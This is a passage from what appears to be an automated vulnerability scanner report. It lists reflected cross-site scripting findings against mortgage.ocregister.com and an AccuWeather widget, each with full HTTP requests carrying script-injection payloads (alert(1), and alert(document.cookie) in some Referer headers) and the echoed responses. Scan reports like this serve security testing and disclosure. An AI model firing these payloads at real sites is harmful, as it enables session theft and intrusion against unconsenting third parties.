<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
el="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie?19724\"><script>alert(1)</script>5a15440a445=1feed/" />
...[SNIP]...

1.392. http://mortgage.ocregister.com/files [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /files

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7804f"><script>alert(1)</script>b31526e044f was submitted in the REST URL parameter 1. This input was echoed as 7804f\"><script>alert(1)</script>b31526e044f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /files7804f"><script>alert(1)</script>b31526e044f HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/files7804f\"><script>alert(1)</script>b31526e044ffeed/" />
...[SNIP]...

1.393. http://mortgage.ocregister.com/files [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /files

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bcea"><script>alert(1)</script>d63783f7e5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bcea\"><script>alert(1)</script>d63783f7e5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /files?3bcea"><script>alert(1)</script>d63783f7e5a=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/files?3bcea\"><script>alert(1)</script>d63783f7e5a=1feed/" />
...[SNIP]...

1.394. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /ver1.0/Content/dmhotlinks.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12f7c"><script>alert(1)</script>5e4882fdc7d was submitted in the REST URL parameter 1. This input was echoed as 12f7c\"><script>alert(1)</script>5e4882fdc7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.012f7c"><script>alert(1)</script>5e4882fdc7d/Content/dmhotlinks.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 44146092a8373b49c062f68d9825aa14=1; s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; AxData=; Axxd=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:03:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:03:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ver1.012f7c\"><script>alert(1)</script>5e4882fdc7d/Content/dmhotlinks.cssfeed/" />
...[SNIP]...

1.395. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /ver1.0/Content/dmhotlinks.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17b7a"><script>alert(1)</script>df3c8a873d1 was submitted in the REST URL parameter 2. This input was echoed as 17b7a\"><script>alert(1)</script>df3c8a873d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Content17b7a"><script>alert(1)</script>df3c8a873d1/dmhotlinks.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 44146092a8373b49c062f68d9825aa14=1; s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; AxData=; Axxd=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:03:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:03:05 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ver1.0/Content17b7a\"><script>alert(1)</script>df3c8a873d1/dmhotlinks.cssfeed/" />
...[SNIP]...

1.396. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /ver1.0/Content/dmhotlinks.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92232"><script>alert(1)</script>8606eb47764 was submitted in the REST URL parameter 3. This input was echoed as 92232\"><script>alert(1)</script>8606eb47764 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Content/dmhotlinks.css92232"><script>alert(1)</script>8606eb47764 HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 44146092a8373b49c062f68d9825aa14=1; s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; AxData=; Axxd=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:03:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:03:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css92232\"><script>alert(1)</script>8606eb47764feed/" />
...[SNIP]...

1.397. http://mortgage.ocregister.com/wp-content/plugins/democracy/basic.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-content/plugins/democracy/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 766d1"><script>alert(1)</script>8572d6a55e6 was submitted in the REST URL parameter 1. This input was echoed as 766d1\"><script>alert(1)</script>8572d6a55e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /766d1"><script>alert(1)</script>8572d6a55e6/plugins/democracy/basic.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/766d1\"><script>alert(1)</script>8572d6a55e6/plugins/democracy/basic.cssfeed/" />
...[SNIP]...

1.398. http://mortgage.ocregister.com/wp-content/plugins/democracy/democracy.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-content/plugins/democracy/democracy.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1fb8"><script>alert(1)</script>a22401a108a was submitted in the REST URL parameter 1. This input was echoed as e1fb8\"><script>alert(1)</script>a22401a108a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e1fb8"><script>alert(1)</script>a22401a108a/plugins/democracy/democracy.js HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:14 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/e1fb8\"><script>alert(1)</script>a22401a108a/plugins/democracy/democracy.jsfeed/" />
...[SNIP]...

1.399. http://mortgage.ocregister.com/wp-content/plugins/democracy/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-content/plugins/democracy/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf114"><script>alert(1)</script>95836e536ce was submitted in the REST URL parameter 1. This input was echoed as cf114\"><script>alert(1)</script>95836e536ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cf114"><script>alert(1)</script>95836e536ce/plugins/democracy/style.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:11 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/cf114\"><script>alert(1)</script>95836e536ce/plugins/democracy/style.cssfeed/" />
...[SNIP]...

1.400. http://mortgage.ocregister.com/wp-content/themes/onSet/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-content/themes/onSet/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62930"><script>alert(1)</script>7b7b2ccc4d6 was submitted in the REST URL parameter 1. This input was echoed as 62930\"><script>alert(1)</script>7b7b2ccc4d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /62930"><script>alert(1)</script>7b7b2ccc4d6/themes/onSet/style.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/62930\"><script>alert(1)</script>7b7b2ccc4d6/themes/onSet/style.cssfeed/" />
...[SNIP]...

1.401. http://mortgage.ocregister.com/wp-includes/js/swfobject.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-includes/js/swfobject.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce7f3"><script>alert(1)</script>dcab4cc6610 was submitted in the REST URL parameter 1. This input was echoed as ce7f3\"><script>alert(1)</script>dcab4cc6610 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ce7f3"><script>alert(1)</script>dcab4cc6610/js/swfobject.js?ver=2.2 HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ce7f3\"><script>alert(1)</script>dcab4cc6610/js/swfobject.js?ver=2.2feed/" />
...[SNIP]...

1.402. http://mortgage.ocregister.com/wp-includes/wlwmanifest.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-includes/wlwmanifest.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f534"><script>alert(1)</script>e883ec4e0ce was submitted in the REST URL parameter 1. This input was echoed as 3f534\"><script>alert(1)</script>e883ec4e0ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3f534"><script>alert(1)</script>e883ec4e0ce/wlwmanifest.xml HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/3f534\"><script>alert(1)</script>e883ec4e0ce/wlwmanifest.xmlfeed/" />
...[SNIP]...

1.403. http://mortgage.ocregister.com/xmlrpc.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /xmlrpc.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86904"><script>alert(1)</script>1d2a8825119 was submitted in the REST URL parameter 1. This input was echoed as 86904\"><script>alert(1)</script>1d2a8825119 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xmlrpc.php86904"><script>alert(1)</script>1d2a8825119?rsd HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/xmlrpc.php86904\"><script>alert(1)</script>1d2a8825119?rsdfeed/" />
...[SNIP]...

1.404. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacc4"%3balert(1)//bc4341ec3d3 was submitted in the lang parameter. This input was echoed as dacc4";alert(1)//bc4341ec3d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=engdacc4"%3balert(1)//bc4341ec3d3&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:17:56 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n32), ms jfk-agg-n32 ( origin>CONN)
Cache-Control: max-age=3360
Expires: Thu, 03 Feb 2011 17:13:56 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
Type;
return ret;
}


